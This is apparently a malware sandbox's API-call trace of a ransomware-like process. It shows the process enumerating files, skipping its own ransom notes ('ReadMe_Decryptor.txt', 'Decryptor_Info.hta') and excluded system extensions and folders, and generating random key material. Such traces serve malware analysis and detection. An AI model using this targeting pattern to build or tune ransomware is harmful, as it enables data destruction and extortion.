lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0107.811] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0107.811] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x7b0828 [0107.811] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbe) returned 0x23bc208 [0107.811] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7b0828 | out: hHeap=0x6d0000) returned 1 [0107.811] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x7a31b8 [0107.811] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23bc208 | out: hHeap=0x6d0000) returned 1 [0107.811] FindNextFileW (in: hFindFile=0x758d88, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x36db9d00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x36db9d00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf5e95540, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x10a5df8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OnoteLR.cab", cAlternateFileName="")) returned 1 [0107.811] lstrcmpW (lpString1="OnoteLR.cab", lpString2=".") returned 1 [0107.811] lstrcmpW (lpString1="OnoteLR.cab", lpString2="..") returned 1 [0107.811] lstrcmpiW (lpString1="OnoteLR.cab", lpString2="ReadMe_Decryptor.txt") returned -1 [0107.811] lstrcmpiW (lpString1="OnoteLR.cab", lpString2="Decryptor_Info.hta") returned 1 [0107.811] PathFindExtensionW (pszPath="OnoteLR.cab") returned=".cab" [0107.811] lstrcmpiW (lpString1=".cab", lpString2=".exe") returned -1 [0107.811] lstrcmpiW (lpString1=".cab", lpString2=".sys") returned -1 [0107.811] lstrcmpiW (lpString1=".cab", lpString2=".lnk") returned -1 [0107.812] lstrcmpiW (lpString1=".cab", lpString2=".dll") returned -1 [0107.812] lstrcmpiW (lpString1=".cab", lpString2=".msi") returned -1 [0107.812] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x7b0828 [0107.812] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbe) returned 0x23bc208 [0107.812] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7b0828 | out: hHeap=0x6d0000) returned 1 [0107.812] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x7a3260 [0107.812] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23bc208 | out: hHeap=0x6d0000) returned 1 [0107.812] FindNextFileW (in: hFindFile=0x758d88, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf6e0d4a0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x7c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0107.812] lstrcmpW (lpString1="Setup.xml", lpString2=".") returned 1 [0107.812] lstrcmpW (lpString1="Setup.xml", lpString2="..") returned 1 [0107.812] lstrcmpiW (lpString1="Setup.xml", lpString2="ReadMe_Decryptor.txt") returned 1 [0107.812] lstrcmpiW (lpString1="Setup.xml", lpString2="Decryptor_Info.hta") returned 1 [0107.812] PathFindExtensionW (pszPath="Setup.xml") returned=".xml" [0107.812] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0107.812] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0107.812] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0107.812] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0107.812] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0107.812] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x7b0828 [0107.812] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbe) returned 0x23bc208 [0107.812] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7b0828 | out: hHeap=0x6d0000) returned 1 [0107.812] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x7a35a8 [0107.813] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23bc208 | out: hHeap=0x6d0000) returned 1 [0107.813] FindNextFileW (in: hFindFile=0x758d88, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf6e0d4a0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x7c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0107.813] FindClose (in: hFindFile=0x758d88 | out: hFindFile=0x758d88) returned 1 [0107.814] FindNextFileW (in: hFindFile=0x758d08, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5b30b20, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa5bc90a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5bc90a0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{90140000-00B4-0409-1000-0000000FF1CE}-C", cAlternateFileName="{912E0~1")) returned 1 [0107.814] lstrcmpW (lpString1="{90140000-00B4-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0107.814] lstrcmpW (lpString1="{90140000-00B4-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0107.814] lstrlenW (lpString="{90140000-00B4-0409-1000-0000000FF1CE}-C") returned 40 [0107.814] lstrcatW (in: lpString1="C:\\MSOCache\\All Users\\", lpString2="{90140000-00B4-0409-1000-0000000FF1CE}-C" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C") returned="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C" [0107.814] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C", lpString2="C:\\Windows") returned -1 [0107.814] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0107.814] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0107.814] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C", lpString2="C:\\ProgramData") returned -1 [0107.814] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned -1 [0107.815] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow") returned -1 [0107.815] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft") returned -1 [0107.815] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned -1 [0107.815] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned -1 [0107.815] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned -1 [0107.815] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned -1 [0107.815] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0107.815] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C", lpString2="C:\\Intel") returned 1 [0107.815] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C", lpString2="C:\\msys32") returned -1 [0107.815] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C", lpString2="C:\\Qt") returned -1 [0107.815] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C", lpString2="C:\\ProgramData") returned -1 [0107.815] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C", lpString2="C:\\Program Files") returned -1 [0107.815] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C", lpString2="C:\\Windows") returned -1 [0107.815] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C", lpString2="C:\\Program Files (x86)") returned -1 [0107.815] lstrcatW (in: lpString1="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C", lpString2="\\" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\") returned="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\" [0107.815] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\") returned 63 [0107.815] FindFirstFileExW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2) Thread: id = 213 os_tid = 0xe80 [0105.007] GetLastError () returned 0x57 [0105.007] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x364) returned 0x77dae0 [0105.007] SetLastError (dwErrCode=0x57) [0105.007] GetCurrentThreadId () returned 0xe80 [0105.008] GetCurrentThreadId () returned 0xe80 [0105.008] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x10) returned 0x6df140 [0105.008] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b888 | out: hHeap=0x6d0000) returned 1 [0105.008] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20023) returned 0x72bfe8 [0105.010] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x72c000, nSize=0xffff | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0105.010] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8) returned 0x72b888 [0105.010] RtlTryEnterCriticalSection (CriticalSection=0xcce05c) returned 0 [0105.010] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e74c8 [0105.010] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x6ef090 [0105.010] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e74c8 | out: hHeap=0x6d0000) returned 1 [0105.010] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x72a8a8 [0105.010] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ef090 | out: hHeap=0x6d0000) returned 1 [0105.010] RtlTryEnterCriticalSection (CriticalSection=0xcce05c) returned 0 [0105.010] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x78) returned 0x6e1368 [0105.010] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18) returned 0x709fe8 [0105.010] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x30) returned 0x72b180 [0105.010] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x30) returned 0x72b1b8 [0105.011] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x30) returned 0x72b1f0 [0105.011] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709fe8 | out: hHeap=0x6d0000) returned 1 [0105.011] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18) returned 0x709fe8 [0105.011] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x6e8a98 [0105.011] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x30) returned 0x72b228 [0105.011] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x72a900 [0105.011] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709fe8 | out: hHeap=0x6d0000) returned 1 [0105.011] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x48) returned 0x72a958 [0105.011] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x77de50 [0105.011] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b228 | out: hHeap=0x6d0000) returned 1 [0105.011] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x6ef090 [0105.011] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x6e8a48 [0105.011] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a958 | out: hHeap=0x6d0000) returned 1 [0105.011] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20023) returned 0x7808c0 [0105.014] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x7808e0, nSize=0xffff | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0105.014] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x6ef0f8 [0105.014] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x77dea8 [0105.014] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ef090 | out: hHeap=0x6d0000) returned 1 [0105.014] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x6ef090 [0105.014] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x70) returned 0x72a958 [0105.014] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd8) returned 0x77df40 [0105.014] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77dea8 | out: hHeap=0x6d0000) returned 1 [0105.014] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x77dea8 [0105.014] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x77e020 [0105.014] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x77e078 [0105.014] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x138) returned 0x77e0d0 [0105.014] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77df40 | out: hHeap=0x6d0000) returned 1 [0105.014] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x77c4e0 [0105.014] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x77c538 [0105.015] GetEnvironmentVariableW (in: lpName="SYSTEMDRIVE", lpBuffer=0x292f57c, nSize=0x32 | out: lpBuffer="C:") returned 0x2 [0105.015] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x6e8a70 [0105.015] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x6e89d0 [0105.015] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c8) returned 0x77d4c8 [0105.015] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77e0d0 | out: hHeap=0x6d0000) returned 1 [0105.015] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x6e8ac0 [0105.015] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x30) returned 0x72b228 [0105.015] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x72bbf8 [0105.015] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x30) returned 0x72b260 [0105.015] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7808c0 | out: hHeap=0x6d0000) returned 1 [0105.015] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1d4e3) returned 0x7808c0 [0105.015] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x130) returned 0x77e0d0 [0105.015] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x72bc20 [0105.015] CryptAcquireContextA (in: phProv=0x292f4f0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x292f4f0*=0x77df00) returned 1 [0105.017] CryptGenRandom (in: hProv=0x709260, dwLen=0x20, pbBuffer=0x72bc20 | out: pbBuffer=0x72bc20) returned 1 [0105.017] CryptReleaseContext (hProv=0x77df00, dwFlags=0x0) returned 1 [0105.017] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72bc20 | out: hHeap=0x6d0000) returned 1 [0105.017] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x72bc20 [0105.017] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x120c) returned 0x702008 [0105.017] QueryPerformanceCounter (in: lpPerformanceCount=0x292f448 | out: lpPerformanceCount=0x292f448*=22497250307) returned 1 [0105.017] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x292f488 | out: lpSystemTimeAsFileTime=0x292f488*(dwLowDateTime=0x2c319460, dwHighDateTime=0x1d62227)) [0105.017] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e74c8 [0105.017] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14) returned 0x709fe8 [0105.017] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14) returned 0x709fc8 [0105.017] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b8d8 [0105.018] GetLastError () returned 0x0 [0105.018] SetLastError (dwErrCode=0x0) [0105.018] GetLastError () returned 0x0 [0105.018] SetLastError (dwErrCode=0x0) [0105.018] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709fe8 | out: hHeap=0x6d0000) returned 1 [0105.018] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709fc8 | out: hHeap=0x6d0000) returned 1 [0105.018] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72b298 [0105.018] GetLastError () returned 0x0 [0105.018] SetLastError (dwErrCode=0x0) [0105.018] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b298 | out: hHeap=0x6d0000) returned 1 [0105.018] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72b298 [0105.018] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x6ef160 [0105.018] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x72bc48 [0105.018] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x6f0120 [0105.018] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8) returned 0x72b8b8 [0105.018] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x72bc70 [0105.018] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x10) returned 0x6df128 [0105.018] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8) returned 0x72b8f8 [0105.018] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x72bc98 [0105.018] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x10) returned 0x77d6f8 [0105.019] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x72bcc0 [0105.019] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x6f0228 [0105.019] GetLastError () returned 0x0 [0105.019] SetLastError (dwErrCode=0x0) [0105.019] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b298 | out: hHeap=0x6d0000) returned 1 [0105.019] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1b) returned 0x72bce8 [0105.019] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1b) returned 0x72bd10 [0105.019] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b8e8 [0105.019] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b908 [0105.019] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8) returned 0x72b918 [0105.019] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b908 | out: hHeap=0x6d0000) returned 1 [0105.019] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8) returned 0x72b908 [0105.019] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b918 | out: hHeap=0x6d0000) returned 1 [0105.019] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b8e8 | out: hHeap=0x6d0000) returned 1 [0105.019] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8) returned 0x72b8e8 [0105.019] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc) returned 0x77d710 [0105.019] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b8e8 | out: hHeap=0x6d0000) returned 1 [0105.019] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc) returned 0x77d728 [0105.019] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77d710 | out: hHeap=0x6d0000) returned 1 [0105.019] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b908 | out: hHeap=0x6d0000) returned 1 [0105.020] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc) returned 0x77d710 [0105.020] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x10) returned 0x77d740 [0105.020] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77d710 | out: hHeap=0x6d0000) returned 1 [0105.020] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x10) returned 0x77d710 [0105.020] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77d740 | out: hHeap=0x6d0000) returned 1 [0105.020] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77d728 | out: hHeap=0x6d0000) returned 1 [0105.020] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x10) returned 0x77d728 [0105.020] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18) returned 0x709fc8 [0105.020] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77d728 | out: hHeap=0x6d0000) returned 1 [0105.020] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14) returned 0x709fe8 [0105.020] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709fc8 | out: hHeap=0x6d0000) returned 1 [0105.020] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77d710 | out: hHeap=0x6d0000) returned 1 [0105.020] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14) returned 0x709fc8 [0105.020] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x72bd38 [0105.020] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709fc8 | out: hHeap=0x6d0000) returned 1 [0105.020] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18) returned 0x709fc8 [0105.020] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72bd38 | out: hHeap=0x6d0000) returned 1 [0105.020] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709fe8 | out: hHeap=0x6d0000) returned 1 [0105.020] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18) returned 0x709fe8 [0105.020] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x24) returned 0x72a7c8 [0105.020] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709fe8 | out: hHeap=0x6d0000) returned 1 [0105.020] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x72bd38 [0105.020] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a7c8 | out: hHeap=0x6d0000) returned 1 [0105.020] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709fc8 | out: hHeap=0x6d0000) returned 1 [0105.020] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8) returned 0x72b908 [0105.021] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc) returned 0x77d710 [0105.021] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b908 | out: hHeap=0x6d0000) returned 1 [0105.021] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x10) returned 0x77d728 [0105.021] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77d710 | out: hHeap=0x6d0000) returned 1 [0105.021] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18) returned 0x709fc8 [0105.021] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77d728 | out: hHeap=0x6d0000) returned 1 [0105.021] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x24) returned 0x72a7c8 [0105.021] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709fc8 | out: hHeap=0x6d0000) returned 1 [0105.021] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a7c8 | out: hHeap=0x6d0000) returned 1 [0105.021] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72bd38 | out: hHeap=0x6d0000) returned 1 [0105.021] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72bce8 | out: hHeap=0x6d0000) returned 1 [0105.021] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x77e208 [0105.021] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f0120 | out: hHeap=0x6d0000) returned 1 [0105.021] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72bc48 | out: hHeap=0x6d0000) returned 1 [0105.021] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x77e328 [0105.021] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77e328 | out: hHeap=0x6d0000) returned 1 [0105.021] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x77e328 [0105.021] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x77e448 [0105.021] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77e328 | out: hHeap=0x6d0000) returned 1 [0105.021] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77e448 | out: hHeap=0x6d0000) returned 1 [0105.021] RtlAllocateHeap 